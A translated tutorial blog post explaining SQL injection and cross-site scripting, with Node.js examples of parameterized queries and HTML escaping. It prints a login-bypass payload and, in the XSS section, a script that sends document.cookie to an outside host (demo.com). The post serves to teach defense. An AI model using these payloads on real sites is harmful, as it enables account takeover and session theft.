Analysis and prevention of common XSS and SQL injection attacks

Introduction to SQL injection
SQL injection (SQL Injection) is the most common type of security vulnerability in web development. An attacker can use it to read sensitive information from the database, or abuse database features to add users, export files and carry out a whole series of other malicious actions; in the worst case they may obtain the privileges of the database system user, or even the highest privileges on the host.

SQL injection arises because the program does not escape or filter user input. This lets an attacker submit malicious SQL code to the server as input; when the program receives it, it executes the attacker's input as part of a query, so the logic of the original query is changed and the malicious code the attacker crafted is executed in addition.

Many web developers do not realize that SQL queries can be tampered with, and so treat an SQL query as a trusted command. In fact an injected SQL query can circumvent access controls and thereby bypass standard authentication and authorization checks; worse still, it can be possible to run commands at the host operating-system level through SQL.

SQL injection principle
This section uses a few concrete examples to explain in detail how SQL injection works.

Consider the following simple administrator login form:

<form action="/login" method="POST">
<p>Username: <input type="text" name="username" /></p>
<p>Password: <input type="password" name="password" /></p>
<p><input type="submit" value="登陆" /></p>
</form>

The back-end SQL statement might look like this:

let querySQL = `
    SELECT *
    FROM user
    WHERE username = '${username}'
    AND psw = '${password}'
`;
// next step: execute the SQL statement ...

The goal is to check whether the user name and password are correct. At first glance there seems to be nothing wrong with the SQL statement above, and it really does achieve that goal, but only if you assume users will honestly enter input of the kind you designed for. If a malicious attacker enters the username zhangsan' OR 1 = 1 -- and any password at all, the system lets them straight in.

Calm down and think about it. The SQL statement we originally expected was:

SELECT * FROM user WHERE username = 'zhangsan' AND psw = 'mypassword'

But the malicious attacker's strange user name turns your SQL statement into the following form:

SELECT * FROM user WHERE username = 'zhangsan' OR 1 = 1 -- ' AND psw = 'xxxx'

In SQL, -- marks the rest of the line as a comment, so the query effectively becomes:

SELECT * FROM user WHERE username = 'zhangsan' OR 1 = 1
The WHERE condition of this statement is always true, which means a malicious attacker can log into my account without knowing my password and then do whatever they like inside it. This is only the simplest kind of injection; a seasoned SQL injection expert can even go on to run host-level system commands through SQL and read the contents of your host at a glance. I am not able to go that deep here, since I do not study such attacks professionally, but the example above already shows the principle of SQL injection, and from it we can work out the basic defenses.

Prevent SQL injection
The main idea behind preventing SQL injection is that user input must never be allowed to alter the logic of the normal SQL statement. Whenever user-supplied data is used to build an SQL statement, we should never trust it: every piece of it must be escaped and filtered. Of course that alone is not enough; here are several precautions for defending against SQL injection:

1. Strictly limit the web application's privileges on the database. Give it only the minimum rights needed for its work, so that the harm an injection attack can do to the database is minimized.
2. Check on the back end that every piece of input matches what is expected, and strictly restrict variable types, for example by matching numeric input against a regular expression.
3. Escape or encode special characters ( ' " \ < > & * ; etc.) before they reach the database. Essentially every back-end language has string escaping methods, such as lodash's _escapeHtmlChar.
4. Use the parameterized query interface provided by the database for all queries. Parameterized statements pass user input as parameters rather than splicing the variables directly into the SQL statement. For example, the ? placeholder parameters of the query method in the Node.js mysqljs library:

mysql.query('SELECT * FROM user WHERE username = ? AND psw = ?', [username, psw]);

5. Before releasing the application, test it with a professional SQL injection detection tool and fix any SQL injection vulnerabilities that are found. There are many open-source tools for this, such as sqlmap and SQLninja.
6. Avoid having the site print SQL error messages (error type, field mismatch, etc.) that expose the SQL statements in the code, so that an attacker cannot use the error messages to assist SQL injection.
7. Error messages returned to users should not be too detailed. If the aim is to aid debugging, use back-end logs instead, and do not expose too much error information in the interface; after all, real users do not care about technical details, and a reasonable message is enough.
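The following is an added example, not code from the original post: it shows rules 2, 3 and 4 above applied in Node.js to the article's own login query, with the spliced version beside the parameterized one. It assumes the user table and username/psw columns from the article; no database is connected, so only the query text is built and inspected. The formatQuery function is a small stand-in for the ? placeholder handling of a driver such as mysqljs, not that library's code, and the function names and sample values are constructed for the example.

```javascript
// Added example: validating, escaping and parameterizing user input before it
// reaches SQL. Assumes the article's `user` table with `username`/`psw` columns;
// `formatQuery` imitates driver-style `?` placeholders and is not mysqljs code.

// Rule 2: whitelist the shape of the input before it is used at all.
const USERNAME_RE = /^[A-Za-z0-9_]{3,32}$/;
function isValidUsername(username) {
  return typeof username === 'string' && USERNAME_RE.test(username);
}

// Rule 3: escape characters that are special inside a single-quoted SQL
// string literal (MySQL-style backslash escaping).
function escapeSqlString(value) {
  return value.replace(/[\0\n\r\b\t\x1a\\'"]/g, (ch) => {
    switch (ch) {
      case '\0': return '\\0';
      case '\n': return '\\n';
      case '\r': return '\\r';
      case '\b': return '\\b';
      case '\t': return '\\t';
      case '\x1a': return '\\Z';
      default: return '\\' + ch; // backslash and both quote characters
    }
  });
}

// Rule 4: bind values through placeholders. Each `?` becomes a quoted,
// escaped literal (or a bare number / NULL); raw text is never spliced in.
function formatQuery(sql, params) {
  let i = 0;
  const out = sql.replace(/\?/g, () => {
    if (i >= params.length) throw new Error('too few parameters for query');
    const v = params[i++];
    if (v === null || v === undefined) return 'NULL';
    if (typeof v === 'number') return String(v);
    return "'" + escapeSqlString(String(v)) + "'";
  });
  if (i !== params.length) throw new Error('too many parameters for query');
  return out;
}

// The vulnerable construction from the article: input spliced into the statement.
function buildLoginQueryUnsafe(username, password) {
  return `SELECT * FROM user WHERE username = '${username}' AND psw = '${password}'`;
}

// The parameterized construction: the same statement with bound values.
function buildLoginQuerySafe(username, password) {
  return formatQuery('SELECT * FROM user WHERE username = ? AND psw = ?', [username, password]);
}

// Constructed sample input: the article's username payload and a throwaway password.
const PAYLOAD_USERNAME = "zhangsan' OR 1 = 1 --";
const ANY_PASSWORD = 'xxxx';

console.log('valid username?', isValidUsername(PAYLOAD_USERNAME));  // false
console.log(buildLoginQueryUnsafe(PAYLOAD_USERNAME, ANY_PASSWORD)); // condition becomes OR 1 = 1
console.log(buildLoginQuerySafe(PAYLOAD_USERNAME, ANY_PASSWORD));   // payload stays inside the literal
```

Run it with node: the spliced query hands the OR 1 = 1 clause to the database, while the parameterized query keeps the whole payload inside one quoted literal (the embedded quote is escaped), so it is compared against the username column as plain text and matches nothing. With a real driver, use its own placeholder API rather than a formatter like this one; input validation and escaping complement parameterization, they do not replace it.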
XSS attack introduction
An XSS attack, i.e. cross-site scripting (Cross Site Scripting), is a common web application vulnerability. The principle is that the attacker inserts malicious script code (CSS code, JavaScript code, etc.) into a web page; when a user browses that page, the embedded script code is executed, achieving the attacker's malicious goal, such as stealing the user's cookie, destroying the page structure, or redirecting to another website.

In theory, anywhere a web page accepts user input without filtering the input data there can be an XSS vulnerability; of course, we also need to filter the data that the view templates output.

XSS attack example
Suppose there is a blog site that offers all users a web page (containing a form) for publishing blog posts, but the site's developers do not do any filtering of the form data users submit. Now, acting as an attacker, I publish a post on the blog site that steals other users' cookie information. The post reads as follows:

<b>This is a XSS test!</b>
<script>
var cookie = document.cookie;
window.open("http://demo.com/getCookie.php?param=" + cookie);
</script>

This is XSS attack code. When other users view this blog post of mine, their cookie data is sent to my website (http://demo.com/), and so I steal the other users' cookie information.

Prevent XSS attacks
The core idea:
Never trust user input; you must filter the input data.

An escaping function converts the special characters into HTML entities, so that the malicious code cannot be executed when it is output. The special characters concerned are mainly ' " & < >.

For example, after my malicious code above is filtered, it becomes the following:

&lt;b&gt;This is a XSS test!&lt;/b&gt;
&lt;script&gt;
var cookie = document.cookie;
window.open(&quot;http://demo.com/getCookie.php?param=&quot; + cookie);
&lt;/script&gt;

In this way the majority of XSS attacks can be prevented.
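An escaping function of the kind described above, as an added example that is not part of the original post. It assumes a Node.js back end that renders posts into HTML at output time; the escapeHtml and renderPost names are constructed for the example, and the sample post body is the article's own payload embedded as input.

```javascript
// Added example: escaping the special characters ' " & < > into HTML entities
// when untrusted content is rendered. Assumes a Node.js back end; `escapeHtml`
// and `renderPost` are names chosen for this example.

// Entity for each of the special characters named in the article.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Replace every special character in `text` with its entity form. The regex
// matches single characters, so already-produced entities are not re-escaped.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Render a blog post. Title and body are untrusted user input and are escaped
// at the point where they are written into the page.
function renderPost(title, body) {
  return [
    '<article>',
    `<h1>${escapeHtml(title)}</h1>`,
    `<div class="body">${escapeHtml(body)}</div>`,
    '</article>',
  ].join('\n');
}

// Constructed sample input: the article's cookie-stealing post body.
const MALICIOUS_BODY = [
  '<b>This is a XSS test!</b>',
  '<script>',
  'var cookie = document.cookie;',
  'window.open("http://demo.com/getCookie.php?param=" + cookie);',
  '</script>',
].join('\n');

// True when the rendered fragment still contains an opening <script> tag.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log(renderPost('Hello', MALICIOUS_BODY));
console.log('live script tag?', containsScriptTag(renderPost('Hello', MALICIOUS_BODY))); // false
```

Run with node; the escaped body matches the filtered output shown above, and the browser displays the post's source as text instead of executing it. Entity escaping like this is the right encoding for HTML text content and quoted attribute values; content placed into a JavaScript block, a URL or a stylesheet needs the encoding appropriate to that context.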


Source: www.cnblogs.com/wujf-myblog/p/11525841.html